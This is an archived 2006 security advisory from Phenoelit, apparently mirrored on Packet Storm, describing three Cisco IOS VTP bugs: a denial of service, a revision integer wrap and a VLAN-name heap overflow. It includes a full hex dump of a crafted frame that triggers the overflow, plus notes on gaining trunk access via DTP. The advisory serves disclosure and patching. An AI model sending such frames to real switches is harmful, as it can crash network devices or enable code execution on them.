exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CiscoVTP.txt

CiscoVTP.txt
Posted Sep 14, 2006
Authored by FX | Site phenoelit.de

Phenoelit Advisory - Cisco Systems IOS contains bugs when handling the VLAN Trunking Protocol (VTP). Specially crafted packets may cause denial of service conditions, confusion of the network operator and a heap overflow with the possibility for arbitrary code execution.

tags | advisory, denial of service, overflow, arbitrary, code execution, protocol
systems | cisco
SHA-256 | 55835c4dae9bb73bab54d974b898751b7ff9355f4016fc955f35996e0c7aed9f

CiscoVTP.txt

Change Mirror Download
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +---+>

[ Title ]
Cisco Systems IOS VTP multiple vulnerabilities

[ Authors ]
FX <fx@phenoelit.de>

Phenoelit Group (http://www.phenoelit.de)
Advisory http://www.phenoelit.de/stuff/CiscoVTP.txt

[ Affected Products ]
Cisco IOS and CatOS

Tested on: C3550 IOS 12.1(19)

Cisco Bug ID: CSCei54611
CERT Vu ID: <not assinged>

[ Vendor communication ]
06.07.05 Initial Notification, gaus@cisco.com
12.07.05 PSIRT member Wendy Garvin <wgarvin@cisco.com>
took over
14.07.05 Wendy states the there is a fix for one of the
issues
19.07.05 According to Wendy, Cisco has trouble reproducing
the issues and finding the affected code
27.07.05 Wendy notifies FX about fixed code
12.09.06 Phenoelit advisory goes to Cisco (FX just forgot
about it, too much to hack, too little time, but the
PSIRT party in Vegas was a good reminder)
13.09.06 Final advisory going public as coordinated release

[ Overview ]
Cisco Systems IOS contains bugs when handling the VLAN
Trunking Protocol (VTP). Specially crafted packets may cause Denial of
Service conditions, confusion of the network operator and a heap
overflow with the possibility for arbitrary code execution.

[ Description ]
Cisco IOS suffers from several bugs in the VTP handling code. All
issues require VTP to be in server or client mode. Transparent mode
(default) is not affected.

Issue 1: Denial of Service
When sending a VTP version 1 summary frame to a Cisco IOS device
and setting the VTP version field to value 2, the device stops
working. Apparently, the VTP handling process will loop and is
terminated by the systems watchdog process, reloading the device.

Issue 2: Integer wrap in VTP revision
If an attacker can send VTP updates (summary and sub) to a Cisco IOS
or CatOS device, he can choose the revision of the VTP information.
A revision of 0x7FFFFFFF will be accepted by IOS. When the switchs
VLAN configuration is changed by an operator, IOS increases the
revision, which becomes 0x80000000 and seems to be internally
tracked by a signed integer variable. The revision is therefore
seen as large negative value. From this point in time on, the switch
will not be able to communicate changed VLAN configurations, since
the generated updates will be rejected by all other switches.

Issue 3: VLAN name heap overflow
If an attacker can send VTP updates to a Cisco IOS device, the
type 2 frames contain records for each individual VLAN in the update.
One field of the VTP records contains the name of the VLAN, another
field the length of this name. Sending an update with VLAN name
above 100 bytes and correctly reflecting the length in the VLAN
name length field causes a heap overflow. The overflow can be
exploited to execute arbitrary code on the receiving switch. The
maximum length of a VLAN name in VTP is 255 bytes.

[ Example ]
The following is an example frame for issue 3. The appropriate VTP
summary advertisement (type 1) must be sent before this frame.

IEEE 802.3 Ethernet
Destination: CDP/VTP (01:00:0c:cc:cc:cc)
Source: <any>
Length: 260
Logical-Link Control
Virtual Trunking Protocol
Version: 0x01
Code: Subset-Advert (0x02)
Sequence Number: 1
Management Domain Length: 5
Management Domain: AAAAA
Configuration Revision Number: 3
VLAN Information
VLAN Information Length: 212
Status: 0x00
VLAN Type: Ethernet (0x01)
VLAN Name Length: 200
ISL VLAN ID: 0x0001
MTU Size: 1500
802.10 Index: 0x000186a1
VLAN Name: AAAAA[...]AAAAAA (200 in total)

0000 01 00 0c cc cc cc 00 fe fe c0 01 00 01 04 aa aa ...........^....
0010 03 00 00 0c 20 03 01 02 01 05 41 41 41 41 41 00 .... .....AAAAA.
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 03 d4 00 ................
0040 01 c8 00 01 05 dc 00 01 86 a1 41 41 41 41 41 41 ..........AAAAAA
0050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0110 41 41 AA

[ Notes ]
The VTP management domain is needed for the summary advertisement
to be correct. This information is distributed via CDP if enabled.

The attacker has to be on a trunk port for VTP frames to be
accepted. The Dynamic Trunk Protocol (DTP) can be used to become
a trunking peer.

[ Solution ]
Cisco Systems provides fixed software, which can be found based on
the following bug IDs:
CSCsd52629/CSCsd34759 -- VTP version field DoS
CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
CSCsd34855/CSCei54611 -- Buffer Overflow in VTP VLAN name

In general, it is recommended to configure a shared VTP password,
which will be used in an MD5 hash to protect the summary
advertisement.

[ end of file ($Revision: 1.1 $) ]

--
FX <fx@phenoelit.de>
Phenoelit (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close